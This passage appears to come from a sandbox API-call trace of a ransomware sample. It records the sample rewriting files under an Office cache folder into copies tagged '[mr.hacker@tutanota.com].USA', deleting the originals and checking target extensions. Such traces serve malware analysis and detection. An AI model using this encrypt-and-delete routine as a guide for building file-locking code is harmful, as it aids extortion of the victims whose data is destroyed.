Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.354] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.354] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.354] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.358] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.358] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.361] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.361] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.361] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.764] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.764] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0048.775] SetEndOfFile (hFile=0x1b0) returned 1 [0048.776] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40270d8 [0048.776] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.776] WriteFile (in: hFile=0x1b0, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.777] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.777] WriteFile (in: hFile=0x1b0, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.779] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.779] WriteFile (in: hFile=0x1b0, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.780] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270d8 | out: hHeap=0x5d0000) returned 1 [0048.780] CloseHandle (hObject=0x1b0) returned 1 [0048.781] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.781] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.781] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.781] lstrlenW (lpString=".doc") returned 4 [0048.781] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString=".docx") returned 5 [0048.781] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0048.781] lstrlenW (lpString=".pdf") returned 4 [0048.781] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString=".xls") returned 4 [0048.781] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString=".xlsx") returned 5 [0048.781] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0048.781] lstrlenW (lpString=".ppt") returned 4 [0048.781] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.781] lstrlenW (lpString=".zip") returned 4 [0048.781] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString=".rar") returned 4 [0048.781] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.781] lstrlenW (lpString=".bz2") returned 4 [0048.781] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.782] lstrlenW (lpString=".7z") returned 3 [0048.782] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString=".dbf") returned 4 [0048.782] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString=".1cd") returned 4 [0048.782] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString=".jpg") returned 4 [0048.782] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString=".doc") returned 4 [0048.782] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString=".docx") returned 5 [0048.782] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0048.782] lstrlenW (lpString=".pdf") returned 4 [0048.782] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString=".xls") returned 4 [0048.782] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString=".xlsx") returned 5 [0048.782] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0048.782] lstrlenW (lpString=".ppt") returned 4 [0048.782] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.782] lstrlenW (lpString=".zip") returned 4 [0048.782] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString=".rar") returned 4 [0048.782] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.782] lstrlenW (lpString=".bz2") returned 4 [0048.782] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.782] lstrlenW (lpString=".7z") returned 3 [0048.782] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.783] lstrlenW (lpString=".dbf") returned 4 [0048.783] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.783] lstrlenW (lpString=".1cd") returned 4 [0048.783] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.783] lstrlenW (lpString=".jpg") returned 4 [0048.783] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.783] lstrcmpiW (lpString1=".xrm-ms", lpString2=".USA") returned 1 [0048.783] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0048.783] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.783] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=715834) returned 1 [0048.783] CloseHandle (hObject=0x1b0) returned 1 [0048.786] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0048.786] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.786] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.786] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.787] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.787] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0048.787] GetLastError () returned 0x0 [0048.787] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0049.018] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0049.028] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.028] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x104, lpOverlapped=0x0) returned 1 [0049.028] SetEndOfFile (hFile=0x204) returned 1 [0049.152] CloseHandle (hObject=0x204) returned 1 [0049.152] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.152] SetEndOfFile (hFile=0x1b0) returned 1 [0049.157] CloseHandle (hObject=0x1b0) returned 1 [0049.157] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0049.158] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0049.936] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.936] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.936] lstrlenW (lpString=".doc") returned 4 [0049.936] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.936] lstrlenW (lpString=".docx") returned 5 [0049.936] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.936] lstrlenW (lpString=".pdf") returned 4 [0049.936] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.936] lstrlenW (lpString=".xls") returned 4 [0049.937] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".xlsx") returned 5 [0049.937] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.937] lstrlenW (lpString=".ppt") returned 4 [0049.937] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString=".zip") returned 4 [0049.937] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".rar") returned 4 [0049.937] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".bz2") returned 4 [0049.937] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".7z") returned 3 [0049.937] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString=".dbf") returned 4 [0049.937] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString=".1cd") returned 4 [0049.937] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString=".jpg") returned 4 [0049.937] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.937] lstrlenW (lpString=".doc") returned 4 [0049.937] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".docx") returned 5 [0049.937] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.937] lstrlenW (lpString=".pdf") returned 4 [0049.937] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".xls") returned 4 [0049.937] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.937] lstrlenW (lpString=".xlsx") returned 5 [0049.938] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.938] lstrlenW (lpString=".ppt") returned 4 [0049.938] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.938] lstrlenW (lpString=".zip") returned 4 [0049.938] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString=".rar") returned 4 [0049.938] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString=".bz2") returned 4 [0049.938] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString=".7z") returned 3 [0049.938] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.938] lstrlenW (lpString=".dbf") returned 4 [0049.938] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.938] lstrlenW (lpString=".1cd") returned 4 [0049.938] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.938] lstrlenW (lpString=".jpg") returned 4 [0049.938] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.938] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0049.938] lstrlenW (lpString="setup.exe") returned 9 [0049.938] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.333] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=1377656) returned 1 [0050.333] CloseHandle (hObject=0x210) returned 1 [0050.333] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0050.333] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.333] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.334] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.334] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.334] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.929] GetLastError () returned 0x0 [0050.929] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.955] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.988] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x50588, lpOverlapped=0x0) returned 1 [0051.000] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0051.010] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.010] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0051.010] SetEndOfFile (hFile=0x1c4) returned 1 [0051.010] CloseHandle (hObject=0x1c4) returned 1 [0051.010] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.010] SetEndOfFile (hFile=0x210) returned 1 [0051.013] CloseHandle (hObject=0x210) returned 1 [0051.013] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0051.014] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0051.014] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.014] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.014] lstrlenW (lpString=".doc") returned 4 [0051.014] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.014] lstrlenW (lpString=".docx") returned 5 [0051.014] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.014] lstrlenW (lpString=".pdf") returned 4 [0051.014] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.014] lstrlenW (lpString=".xls") returned 4 [0051.014] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.014] lstrlenW (lpString=".xlsx") returned 5 [0051.014] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.014] lstrlenW (lpString=".ppt") returned 4 [0051.014] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.014] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.014] lstrlenW (lpString=".zip") returned 4 [0051.014] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.014] lstrlenW (lpString=".rar") returned 4 [0051.014] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.014] lstrlenW (lpString=".bz2") returned 4 [0051.015] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.015] lstrlenW (lpString=".7z") returned 3 [0051.015] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString=".dbf") returned 4 [0051.015] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString=".1cd") returned 4 [0051.015] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString=".jpg") returned 4 [0051.015] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString=".doc") returned 4 [0051.015] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.015] lstrlenW (lpString=".docx") returned 5 [0051.015] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.015] lstrlenW (lpString=".pdf") returned 4 [0051.015] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString=".xls") returned 4 [0051.015] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString=".xlsx") returned 5 [0051.015] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.015] lstrlenW (lpString=".ppt") returned 4 [0051.015] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.015] lstrlenW (lpString=".zip") returned 4 [0051.015] 